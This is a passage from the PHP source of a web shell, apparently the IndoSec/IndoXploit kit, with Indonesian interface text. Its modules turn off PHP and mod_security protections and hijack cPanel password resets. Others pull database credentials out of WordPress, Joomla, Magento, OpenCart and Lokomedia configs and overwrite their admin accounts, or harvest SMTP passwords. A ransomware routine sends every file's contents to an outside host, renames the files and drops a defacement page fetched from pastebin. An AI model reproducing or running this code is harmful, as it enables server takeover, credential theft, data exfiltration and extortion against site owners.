  1840. @fclose($sockfd);
  1841. }
  1842. }
  1843. echo "</p>";
  1844. exit;
  1845. }
  1846.  
  1847.  
  1848. /*
  1849. * Bypass Disable Function
  1850. * Kuda Shell
  1851. */
  1852. if($_GET['aksi'] == 'disabfunc'){
  1853. echo "<div class='card card-body text-center text-dark'><h4 class='text-center mt-2 mb-3'>Bypass Disable Functions</h2>
  1854. <form method='POST'>
  1855. <input type='submit' class='btn btn-danger' name='ini' value='php.ini'/>
  1856. <input type='submit' class='btn btn-danger' name='htce' value='.htaccess'/>
  1857. <input type='submit' class='btn btn-danger' name='litini' value='Litespeed'/>
  1858. </form>";
  1859. if(isset($_POST['ini'])){
  1860. $file = fopen("php.ini","w");
  1861. echo fwrite($file,"safe_mode = OFF\ndisable_functions = NONE");
  1862. fclose($file);
  1863. echo "<a href='php.ini' class='btn btn-success btn-block' target='_blank'>Klik Coeg!</a>";
  1864. }elseif(isset($_POST['htce'])){
  1865. $file = fopen(".htaccess","w");
  1866. echo fwrite($file,"<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
  1867. fclose($file);
  1868. echo "<p>.htaccess successfully created!</p>";
  1869. }elseif(isset($_POST['litini'])){
  1870. $iniph = "PD8gZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbImZpbGUiXSk7DQplY2hvIGluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOw0KZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbInNzIl07DQo/Pg==";
  1871. $byph = "safe_mode = OFF\ndisable_functions = NONE";
  1872. $comp = "<Files *.php>\nForceType application/x-httpd-php4\n</Files>";
  1873. file_put_contents("php.ini",$byph);
  1874. file_put_contents("ini.php",$iniph);
  1875. file_put_contents(".htaccess",$comp);
  1876. $swa = "success";
  1877. $text = "Disable Functions in Litespeed Created";
  1878. swall($swa,$text,$dir);
  1879. }
  1880. echo "</div>";
  1881. }
  1882.  
  1883.  
  1884. /*
  1885. * Auto Reset Cpanel
  1886. * IndoSec
  1887. */
  1888. if ($_GET['aksi'] == 'resetpasscp') {
  1889. echo '<h5 class="text-center"><i class="fa fa-key"></i> Auto Reset Password Cpanel</h5>
  1890. <form method="POST">
  1891. <div class="form-group input-group">
  1892. <div class="input-group-prepend">
  1893. <div class="input-group-text"><i class="fa fa-envelope"></i></div>
  1894. </div>
  1895. <input type="email" name="email" class="form-control" placeholder="Masukan Email..."/>
  1896. </div>
  1897. <input type="submit" name="submit" class="btn btn-danger btn-block" value="Send"/>
  1898. </div>
  1899. </form>';
  1900.  
  1901. if(isset($_POST['submit'])){
  1902. $user = get_current_user();
  1903. $site = $_SERVER['HTTP_HOST'];
  1904. $ips = getenv('REMOTE_ADDR');
  1905. $email = $_POST['email'];
  1906. $wr = 'email:'.$email;
  1907. $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
  1908. @fwrite($f, $wr);
  1909. @fclose($f);
  1910. $f = fopen('/home/'.$user.'/.contactinfo', 'w');
  1911. @fwrite($f, $wr);
  1912. @fclose($f);
  1913. $parm = $site.':2082/resetpass?start=1';
  1914. echo '<br/>Url: '.$parm.'';
  1915. echo '<br/>Username: '.$user.'';
  1916. echo '<br/>Success Reset To: '.$email.'<br/><br/>';
  1917. }
  1918. exit;
  1919. }
  1920.  
  1921.  
  1922. /*
  1923. * Auto Edit User
  1924. * IndoXploit
  1925. */
  1926. if($_GET['aksi'] == 'auteduser') {
  1927. if($_POST['hajar']) {
  1928. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1929. echo "Username dan Password harus lebih dari 6 karakter";
  1930. } else {
  1931. $user_baru = $_POST['user_baru'];
  1932. $pass_baru = md5($_POST['pass_baru']);
  1933. $conf = $_POST['config_dir'];
  1934. $scan_conf = scandir($conf);
  1935. foreach($scan_conf as $file_conf) {
  1936. if(!is_file("$conf/$file_conf")) continue;
  1937. $config = file_get_contents("$conf/$file_conf");
  1938. if(preg_match("/JConfig|joomla/",$config)) {
  1939. $dbhost = ambilkata($config,"host = '","'");
  1940. $dbuser = ambilkata($config,"user = '","'");
  1941. $dbpass = ambilkata($config,"password = '","'");
  1942. $dbname = ambilkata($config,"db = '","'");
  1943. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1944. $prefix = $dbprefix."users";
  1945. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1946. $db = mysql_select_db($dbname);
  1947. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1948. $result = mysql_fetch_array($q);
  1949. $id = $result['id'];
  1950. $site = ambilkata($config,"sitename = '","'");
  1951. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1952. echo "Config => ".$file_conf."<br>";
  1953. echo "CMS => Joomla<br>";
  1954. if($site == '') {
  1955. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1956. } else {
  1957. echo "Sitename => $site<br>";
  1958. }
  1959. if(!$update OR !$conn OR !$db) {
  1960. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1961. } else {
  1962. echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
  1963. }
  1964. mysql_close($conn);
  1965. } elseif(preg_match("/WordPress/",$config)) {
  1966. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1967. $dbuser = ambilkata($config,"DB_USER', '","'");
  1968. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1969. $dbname = ambilkata($config,"DB_NAME', '","'");
  1970. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1971. $prefix = $dbprefix."users";
  1972. $option = $dbprefix."options";
  1973. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1974. $db = mysql_select_db($dbname);
  1975. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1976. $result = mysql_fetch_array($q);
  1977. $id = $result[ID];
  1978. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1979. $result2 = mysql_fetch_array($q2);
  1980. $target = $result2[option_value];
  1981. if($target == '') {
  1982. $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
  1983. } else {
  1984. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1985. }
  1986. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1987. echo "Config => ".$file_conf."<br>";
  1988. echo "CMS => Wordpress<br>";
  1989. echo $url_target;
  1990. if(!$update OR !$conn OR !$db) {
  1991. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1992. } else {
  1993. echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
  1994. }
  1995. mysql_close($conn);
  1996. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1997. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1998. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1999. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  2000. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  2001. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  2002. $prefix = $dbprefix."admin_user";
  2003. $option = $dbprefix."core_config_data";
  2004. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2005. $db = mysql_select_db($dbname);
  2006. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2007. $result = mysql_fetch_array($q);
  2008. $id = $result[user_id];
  2009. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  2010. $result2 = mysql_fetch_array($q2);
  2011. $target = $result2[value];
  2012. if($target == '') {
  2013. $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
  2014. } else {
  2015. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  2016. }
  2017. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2018. echo "Config => ".$file_conf."<br>";
  2019. echo "CMS => Magento<br>";
  2020. echo $url_target;
  2021. if(!$update OR !$conn OR !$db) {
  2022. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2023. } else {
  2024. echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
  2025. }
  2026. mysql_close($conn);
  2027. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  2028. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  2029. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  2030. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  2031. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  2032. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  2033. $prefix = $dbprefix."user";
  2034. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2035. $db = mysql_select_db($dbname);
  2036. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2037. $result = mysql_fetch_array($q);
  2038. $id = $result[user_id];
  2039. $target = ambilkata($config,"HTTP_SERVER', '","'");
  2040. if($target == '') {
  2041. $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
  2042. } else {
  2043. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  2044. }
  2045. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2046. echo "Config => ".$file_conf."<br>";
  2047. echo "CMS => OpenCart<br>";
  2048. echo $url_target;
  2049. if(!$update OR !$conn OR !$db) {
  2050. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2051. } else {
  2052. echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
  2053. }
  2054. mysql_close($conn);
  2055. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  2056. $dbhost = ambilkata($config,'server = "','"');
  2057. $dbuser = ambilkata($config,'username = "','"');
  2058. $dbpass = ambilkata($config,'password = "','"');
  2059. $dbname = ambilkata($config,'database = "','"');
  2060. $prefix = "users";
  2061. $option = "identitas";
  2062. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2063. $db = mysql_select_db($dbname);
  2064. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  2065. $result = mysql_fetch_array($q);
  2066. $target = $result[alamat_website];
  2067. if($target == '') {
  2068. $target2 = $result[url];
  2069. $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
  2070. if($target2 == '') {
  2071. $url_target2 = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
  2072. } else {
  2073. $cek_login3 = file_get_contents("$target2/adminweb/");
  2074. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  2075. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  2076. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  2077. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  2078. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  2079. } else {
  2080. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2081. }
  2082. }
  2083. } else {
  2084. $cek_login = file_get_contents("$target/adminweb/");
  2085. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2086. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2087. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2088. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2089. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2090. } else {
  2091. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2092. }
  2093. }
  2094. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  2095. echo "Config => ".$file_conf."<br>";
  2096. echo "CMS => Lokomedia<br>";
  2097. if(preg_match('/Error, Tidak dapat mengambil nama domainnya/', $url_target)) {
  2098. echo $url_target2;
  2099. } else {
  2100. echo $url_target;
  2101. }
  2102. if(!$update OR !$conn OR !$db) {
  2103. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2104. } else {
  2105. echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
  2106. }
  2107. mysql_close($conn);
  2108. }
  2109. }
  2110. }
  2111. } else {
  2112. echo "<h3 class='text-center mb-4'>Auto Edit User</h3>
  2113. <form method='post'>
  2114. <h5>Lokasi Dir Config</h5>
  2115. <input type='text' class='form-control mb-3' name='config_dir' value='$dir'>
  2116. <h5>Set User & Pass :</h5>
  2117. <input type='text' name='user_baru' value='indosec' class='form-control mb-3' placeholder='Set Username'>
  2118. <input type='text' name='pass_baru' value='indosec' class='form-control mb-4' placeholder='Set Password'>
  2119. <input type='submit' name='hajar' value='Edit User' class='btn btn-danger btn-block'>
  2120. </form>
  2121. <p class='text-muted mb-4'>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</p>";
  2122. }
  2123. exit;
  2124. }
  2125.  
  2126.  
  2127. /*
  2128. * Ransomware
  2129. * IndoSec
  2130. */
  2131. if ($_GET['aksi'] == 'ransom') {
  2132. if(isset($_POST["encrypt"])) {
  2133. $dir = $_POST["path"];
  2134. echo"<textarea class='form-control mb-4' rows='13' disabled=''>";
  2135. function listFolderFiles($dir){
  2136. if (is_dir($dir)) {
  2137. $ffs = scandir($dir);
  2138. unset($ffs[array_search('.', $ffs, true)]);
  2139. unset($ffs[array_search('..', $ffs, true)]);
  2140. if (count($ffs) < 1)
  2141. return;
  2142. foreach($ffs as $ff){
  2143. $files = $dir."/".$ff;
  2144. if(!is_dir($files)){
  2145. /* encrypt file */
  2146. $file = file_get_contents($files);
  2147. $_a = base64_encode($file);
  2148. /* proses curl */
  2149. $ch = curl_init();
  2150. curl_setopt($ch, CURLOPT_URL, 'http://encrypt.indsc.me/api.php?type=encrypt');
  2151. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2152. curl_setopt($ch, CURLOPT_POSTFIELDS, "text=$_a");
  2153. $x = json_decode(curl_exec($ch));
  2154. if($x->status == 'success'){
  2155. $_enc = base64_decode($x->data);
  2156. rename($files, $files. ".indsc");
  2157. echo "[+]$files => Success Encrypted\n";
  2158. }
  2159. }
  2160. if(is_dir($dir.'/'.$ff)) listFolderFiles($dir.'/'.$ff);
  2161. }
  2162. $index = file_get_contents('https://pastebin.com/raw/aGZ6BeTH');
  2163. $_o = fopen($dir."/index.html", "w");
  2164. fwrite($_o, $index);
  2165. fclose($_o);
  2166. echo "\n[+] Done !";
  2167. }else{
  2168. echo "\nBukan dir";
  2169. }
  2170. }
  2171. listFolderFiles($dir);
  2172. echo "</textarea><br/>";
  2173. }else{
  2174. echo '<form method="post">
  2175. <div class="form-group">
  2176. <h4 class="text-center mb-4"><i class="fa fa-lock"></i> Ransomware</h4>
  2177. <label>Pilih Directory :</label>
  2178. <div class="form-group input-group">
  2179. <div class="input-group-prepend">
  2180. <div class="input-group-text"><i class="fa fa-home"></i></div>
  2181. </div>
  2182. <input type="text" name="path" class="form-control" value="'.$dir.'"/>
  2183. </div>
  2184. <input type="submit" name="encrypt" class="btn btn-danger btn-block" value="Encrypt"/>
  2185. </div>
  2186. </form>';
  2187. }
  2188. exit;
  2189. }
  2190.  
  2191.  
  2192. /*
  2193. * SMTP Grabber
  2194. * IndoXploit
  2195. */
  2196. if ($_GET['aksi'] == 'smtpgrab') {
  2197. function scj($path) {
  2198. $paths = scandir($path);
  2199. foreach($paths as $pathb) {
  2200. if(!is_file("$path/$pathb")) continue;
  2201. $ambil = file_get_contents("$path/$pathb");
  2202. $ambil = str_replace("$", "", $ambil);
  2203. if(preg_match("/JConfig|joomla/", $ambil)) {
  2204. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  2205. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  2206. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  2207. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  2208. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  2209. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  2210. echo "<table class='text-white table table-bordered'>
  2211. <tr>
  2212. <td>SMTP Host: $smtp_host</td>
  2213. </tr>
  2214. <tr>
  2215. <td>SMTP Port: $smtp_port</td>
  2216. </tr>
  2217. <tr>
  2218. <td>SMTP User: $smtp_user</td>
  2219. </tr>
  2220. <tr>
  2221. <td>SMTP Pass: $smtp_pass</td>
  2222. </tr>
  2223. <tr>
  2224. <td>SMTP Auth: $smtp_auth</td>
  2225. </tr>
  2226. <tr>
  2227. <td>SMTP Secure: $smtp_secure</td>
  2228. </tr>
  2229. </table>";
  2230. }
  2231. }
  2232. }
  2233. echo "<p class='text-muted'>NB : Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/namafolder_config )</p>";
  2234. $smtp = scj($path);
  2235. exit;
  2236. }
  2237.  
  2238.  
  2239. /*
  2240. * Bypass Cloud Flare
  2241. */
  2242. if ($_GET['aksi'] == 'bypascf') {
  2243. echo '<form method="POST">
  2244. <h5 class="text-center mb-3">Bypass Cloud Flare</h5>
  2245. <div class="form-group input-group">
  2246. <select class="form-control" name="idsPilih">
  2247. <option>Pilih Metode</option>
  2248. <option>ftp</option>
  2249. <option>direct-conntect</option>
  2250. <option>webmail</option>
  2251. <option>cpanel</option>
  2252. </select>
  2253. </div>
  2254. <div class="form-group input-group mb-4">
  2255. <input class="form-control" type="text" name="target" placeholder="Masukan Url">
  2256. <input class="btn btn-danger form-control" type="submit" value="Bypass">
  2257. </div>
  2258. </form>';
  2259.  
  2260. $target = $_POST['target'];
  2261. if($_POST['idsPilih'] == "ftp") {
  2262. $ftp = gethostbyname("ftp."."$target");
  2263. echo "<p align='center' dir='ltr'><font face='Tahoma' size='3' color='#00ff00'>Correct
  2264. ip is : </font><font face='Tahoma' size='3' color='#F68B1F'>$ftp</font></p>";
  2265. }
  2266. if($_POST['idsPilih'] == "direct-conntect") {
  2267. $direct = gethostbyname("direct-connect."."$target");
  2268. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='3' color='#00ff00'>Correct
  2269. ip is : </font><font face='Tahoma' size='3' color='#F68B1F'>$direct</font></p>";
  2270. }
  2271. if($_POST['idsPilih'] == "webmail") {
  2272. $web = gethostbyname("webmail."."$target");
  2273. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='3' color='#00ff00'>Correct
  2274. ip is : </font><font face='Tahoma' size='3' color='#F68B1F'>$web</font></p>";
  2275. }
  2276. if($_POST['idsPilih'] == "cpanel") {
  2277. $cpanel = gethostbyname("cpanel."."$target");
  2278. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='3' color='#00ff00'>Correct
  2279. ip is : </font><font face='Tahoma' size='3' color='#F68B1F'>$cpanel</font></p>";
  2280. }
  2281. exit;
  2282. }
  2283.  
  2284.  
  2285. /*
  2286. * Zip Menu
  2287. * IndoSec
  2288. */
  2289. if($_GET['aksi'] == 'zip_menu') {
  2290. //Compress/Zip
  2291. $exzip = basename($dir).'.zip';
  2292. function Zip($source, $destination){
  2293. if (extension_loaded('zip') === true){
  2294. if (file_exists($source) === true){
  2295. $zip = new ZipArchive();
  2296. if ($zip->open($destination, ZIPARCHIVE::CREATE) === true){
  2297. $source = realpath($source);
  2298. if (is_dir($source) === true){
  2299. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  2300. foreach ($files as $file){
  2301. $file = realpath($file);
  2302. if (is_dir($file) === true){
  2303. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  2304. }elseif(is_file($file) === true){
  2305. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  2306. }
  2307. }
  2308. }elseif(is_file($source) === true){
  2309. $zip->addFromString(basename($source), file_get_contents($source));
  2310. }
  2311. }
  2312. return @$zip->close();
  2313. }
  2314. }
  2315. return false;
  2316. }
  2317. //Extract/Unzip
  2318. function Zip_Extrack($zip_files, $to_dir){
  2319. $zip = new ZipArchive();
  2320. $res = $zip->open($zip_files);
  2321. if ($res === TRUE) {
  2322. $name = basename($zip_files, ".zip")."_unzip";
  2323. @mkdir($name);
  2324. @$zip->extractTo($to_dir."/".$name);
  2325. return @$zip->close();
  2326. }else{
  2327. return false;
  2328. }
  2329. }
  2330.  
  2331. echo '<div class="card card-body text-dark mb-4">
  2332. <h4 class="text-center">Zip Menu</h3>
  2333. <form enctype="multipart/form-data" method="post">
  2334. <div class="form-group">
  2335. <label>Zip File:</label>
  2336. <div class="custom-file">
  2337. <input type="file" name="zip_file" class="custom-file-input" id="customFile">
  2338. <label class="custom-file-label" for="customFile">Choose file</label>
  2339. </div>
  2340. <input type="submit" name="upnun" class="btn btn-danger btn-block mt-3" value="Upload & Unzip"/>
  2341. </div>
  2342. </form>';
  2343. if($_POST["upnun"]) {
  2344. $filename = $_FILES["zip_file"]["name"];
  2345. $tmp = $_FILES["zip_file"]["tmp_name"];
  2346. if(move_uploaded_file($tmp, "$dir/$filename")){
  2347. echo Zip_Extrack($filename, $dir);
  2348. unlink($filename);
  2349. $swa = "success";
  2350. $text = "Berhasil Mengekstrak Zip";
  2351. swall($swa,$text,$dir);
  2352. } else {
  2353. echo "<b>Gagal!</b>";
  2354. }
  2355. }
  2356.  
  2357. echo "<div class='row'><div class='col-md-6 mb-3'><h5>Zip Backup</h5>
  2358. <form method='post'>
  2359. <label>Folder</label>
  2360. <input type='text' name='folder' class='form-control mb-3' value='$dir'>
  2361. <input type='submit' name='backup' class='btn btn-danger btn-block' value='Backup!'>
  2362. </form>";
  2363. if($_POST['backup']){
  2364. $fol = $_POST['folder'];
  2365. if(Zip($fol, $_POST["folder"].'/'.$exzip)){
  2366. $swa = "success";
  2367. $text = "Berhasil Membuat Zip";
  2368. swall($swa,$text,$dir);
  2369. }else{
  2370. echo "<b>Gagal!</b>";
  2371. }
  2372. }
  2373.  
  2374. echo "</div>
  2375. <div class='col-md-6'><h5>Unzip Manual</h5>
  2376. <form action='' method='post'>
  2377. <label>Zip Location:</label>
  2378. <input type='text' name='file_zip' class='form-control mb-3' value='$dir/$exzip'>
  2379. <input type='submit' name='extrak' class='btn btn-danger btn-block' value='Unzip!'>
  2380. </form>";
  2381. if($_POST['extrak']){
  2382. $zip = $_POST["file_zip"];
  2383. if (Zip_Extrack($zip, $dir)){
  2384. $swa = "success";
  2385. $text = "Berhasil Mengekstrak Zip";
  2386. swall($swa,$text,$dir);
  2387. }else{
  2388. echo "<b>Gagal!</b>";
  2389. }
  2390. }
  2391. echo '</div></div></div>';
  2392.  
  2393. }
  2394.  
  2395. if(isset($_GET['path'])){
  2396. $path = $_GET['path'];
  2397. chdir($path);
  2398. }else{
  2399. $path = getcwd();
  2400. }
  2401. $path = str_replace('\\','/',$path);
  2402. $paths = explode('/',$path);
  2403. echo "Path : ";
  2404. foreach($paths as $id=>$pat){
  2405. if($pat == '' && $id == 0){
  2406. $a = true;
  2407. echo '<a href="?dir=/">/</a>';
  2408. continue;
  2409. }
  2410. if($pat == '') continue;
  2411. echo '<a style="word-wrap:break-word;" href="?dir=';
  2412. for($i=0;$i<=$id;$i++){
  2413. echo "$paths[$i]";
  2414. if($i != $id) echo "/";
  2415. }
  2416. echo '">'.$pat.'</a>/';
  2417. }
  2418. $scandir = scandir($path);
  2419. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  2420. echo '<div id="tab"><table class="text-white mt-1 table-hover table-responsive">
  2421. <thead class="bg-info text-center">
  2422. <th class="text-left">File/Folder</th>
  2423. <th>Size</th>
  2424. <th style="width:50%;">Last Modified</th>
  2425. <th>Permission</th>
  2426. <th>Action</th>
  2427. </thead>';
  2428.  
  2429. foreach($scandir as $dir){
  2430. $dtime = date("d/m/y G:i", filemtime("$dir/$dirx"));
  2431. /* cek jika ini berbentuk folder */
  2432. /* cek jika nama folder karaker terlalu panjang */
  2433. if (strlen($dir) > 18) {
  2434. $_dir = substr($dir, 0, 18)."...";
  2435. }else{
  2436. $_dir = $dir;
  2437. }
  2438. $_diir = $_dir;
  2439. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  2440.  
  2441. echo '<tr class="text-center">
  2442. <td class="pinggir">'.$imgfol.' <a href="?dir='.$path.'/'.$dir.'">'.$_diir.'</a></td>
  2443. <td>--</td>
  2444. <td>
  2445. '.$dtime.'
  2446. </td>
  2447. <td>
  2448. <a href="?dir='.$path.'/'.$dir.'&aksi=chmod_dir">
  2449. ';
  2450. if(is_writable($path.'/'.$dir)) echo '<font color="#00ff00">';
  2451. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  2452. echo perms($path.'/'.$dir);
  2453. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font></a></td>
  2454. <td><a title="Rename" class="badge badge-success" href="?dir='.$path.'/'.$dir.'&aksi=rename_folder">&nbsp;<i class="fas fa-pen"></i>&nbsp;</a>&nbsp;&nbsp;<a title="Delete" class="badge badge-danger" href="?dir='.$path.'/'.$dir.'&aksi=hapus_folder">&nbsp;<i class="fa fa-trash"></i>&nbsp;</a>
  2455. </td>';
  2456. }
  2457.  
  2458. foreach($scandir as $file){
  2459. $ftime = date("d/m/y G:i", filemtime("$path/$file"));
  2460. /* cek jika ini berbentuk file */
  2461. if(!is_file($path.'/'.$file)) continue;
  2462. echo '<tr class="text-center">
  2463. <td class="pinggir"><img src="';
  2464.  
  2465. /* set image berdasarkan extensi file */
  2466. $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
  2467. if($ext == "php") {
  2468. echo 'https://image.flaticon.com/icons/png/128/337/337947.png"';
  2469. }elseif ($ext == "html") {
  2470. echo 'https://image.flaticon.com/icons/png/128/136/136528.png"';
  2471. }elseif ($ext == "css") {
  2472. echo 'https://image.flaticon.com/icons/png/128/136/136527.png"';
  2473. }elseif ($ext == "png") {
  2474. echo 'https://image.flaticon.com/icons/png/128/136/136523.png"';
  2475. }elseif ($ext == "jpg") {
  2476. echo 'https://image.flaticon.com/icons/png/128/136/136524.png"';
  2477. }elseif ($ext == "jpeg") {
  2478. echo 'http://i.imgur.com/e8mkvPf.png"';
  2479. }elseif($ext == "zip") {
  2480. echo 'https://image.flaticon.com/icons/png/128/136/136544.png"';
  2481. }elseif ($ext == "js") {
  2482. echo 'https://image.flaticon.com/icons/png/128/1126/1126856.png';
  2483. }elseif ($ext == "ttf") {
  2484. echo 'https://image.flaticon.com/icons/png/128/1126/1126892.png';
  2485. }elseif ($ext == "otf") {
  2486. echo 'https://image.flaticon.com/icons/png/128/1126/1126891.png';
  2487. }elseif ($ext == "txt") {
  2488. echo 'https://image.flaticon.com/icons/png/128/136/136538.png';
  2489. }elseif ($ext == "ico") {
  2490. echo 'https://image.flaticon.com/icons/png/128/1126/1126873.png';
  2491. }elseif ($ext == "conf") {
  2492. echo 'https://image.flaticon.com/icons/png/512/1573/1573301.png';
  2493. }elseif ($ext == "htaccess") {
  2494. echo 'https://image.flaticon.com/icons/png/128/1720/1720444.png';
  2495. }elseif ($ext == "sh") {
  2496. echo 'https://image.flaticon.com/icons/png/128/617/617535.png';
  2497. }elseif ($ext == "py") {
  2498. echo 'https://image.flaticon.com/icons/png/128/180/180867.png';
  2499. }elseif ($ext == "indsc") {
  2500. echo 'https://image.flaticon.com/icons/png/512/1265/1265511.png';
  2501. }elseif ($ext == "sql") {
  2502. echo 'https://img.icons8.com/ultraviolet/2x/data-configuration.png';
  2503. }elseif ($ext == "pl") {
  2504. echo 'http://i.imgur.com/PnmX8H9.png';
  2505. }elseif ($ext == "pdf") {
  2506. echo 'https://image.flaticon.com/icons/png/128/136/136522.png';
  2507. }elseif ($ext == "mp4") {
  2508. echo 'https://image.flaticon.com/icons/png/128/136/136545.png';
  2509. }elseif ($ext == "mp3") {
  2510. echo 'https://image.flaticon.com/icons/png/128/136/136548.png';
  2511. }elseif ($ext == "git") {
  2512. echo 'https://image.flaticon.com/icons/png/128/617/617509.png';
  2513. }elseif ($ext == "md") {
  2514. echo 'https://image.flaticon.com/icons/png/128/617/617520.png';
  2515. }else{
  2516. echo 'http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png';
  2517. }
  2518. echo '" class="ico2"></img>';
  2519. /* cek jika karaker terlalu panjang */
  2520. if (strlen($file) > 25) {
  2521. $_file = substr($file, 0, 25)."...-.".$ext;
  2522. }else{
  2523. $_file = $file;
  2524. }
  2525. echo' <a href="?dir='.$path.'&aksi=view&file='.$path.'/'.$file.'">'.$_file.'</a></td>
  2526. <td>'.formatSize(filesize($file)).'</td>
  2527. <td>'.$ftime.'</td>
